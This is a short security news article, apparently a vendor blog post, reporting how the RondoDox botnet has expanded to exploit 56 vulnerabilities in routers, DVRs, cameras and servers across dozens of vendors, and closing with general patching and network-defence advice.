RondoDox Botnet Expands to 50+ Vulnerabilities
Researchers have warned that the RondoDox Botnet is becoming more dangerous than ever. It now exploits over 50 security flaws across more than 30 technology vendors.
This campaign uses what experts call an “exploit shotgun” approach. It targets many kinds of internet-connected devices, including routers, DVRs, NVRs, CCTV cameras, and web servers. Therefore, both home users and enterprises are at risk.
How the RondoDox Attacks Begin
A researcher first detected a RondoDox attack attempt on June 15, 2025. The attackers exploited an old TP-Link router vulnerability (CVE-2023-1389) to gain access.
However, this flaw is only one of dozens the botnet now abuses. By combining many exploits, RondoDox can quickly compromise networks and devices at scale.
From Single Device to Multi-Vector Threat
Originally, RondoDox focused on specific devices like digital video recorders and Four-Faith routers. The attackers used them to launch DDoS attacks over HTTP, UDP, and TCP protocols.
Now, the botnet has evolved. It uses a “loader-as-a-service” model, which bundles RondoDox with other malware like Mirai and Morte. Therefore, once one device is infected, it can spread new payloads automatically, making cleanup far more difficult.
Dozens of Vendors Impacted
RondoDox currently weaponizes 56 vulnerabilities, including 18 without official CVE identifiers. These flaws affect devices from dozens of major vendors.
According to a recent report, the list includes D-Link, Linksys, NETGEAR, Cisco, QNAP, Zyxel, and many others. This variety shows how easily attackers can exploit outdated or poorly secured network devices.
Growing Botnet Activity Around the World
New intelligence reveals that RondoDox may be linked to other major botnets such as AISURU. These large-scale operations control hundreds of thousands of compromised IoT devices worldwide.
For example, AISURU is believed to draw its power from infected systems hosted on major U.S. networks. Meanwhile, RondoDox continues to spread through weak credentials and old unpatched flaws. Therefore, it represents a growing global cyber threat.
Coordinated Attacks Using Global Infrastructure
Recent data also shows over 100,000 unique IP addresses participating in coordinated botnet activity across more than 100 countries. Many attacks now target Remote Desktop Protocol (RDP) services in the U.S.
Researchers found that most participating IPs share a common TCP fingerprint, suggesting that the campaign is centrally managed. This structure allows attackers to execute large-scale attacks with precision and speed.
How to Prevent RondoDox Botnet Infections
To stop threats like RondoDox, organizations should update all IoT and network devices with the latest firmware patches. Disabling unused remote access features and enforcing strong, unique passwords for routers and servers can also reduce risk.
Furthermore, managed threat detection systems can monitor abnormal traffic and block suspicious payloads automatically. Network segmentation and advanced intrusion prevention tools can help isolate and eliminate infected devices before they spread malware across the network.
Sleep well, we got you covered.
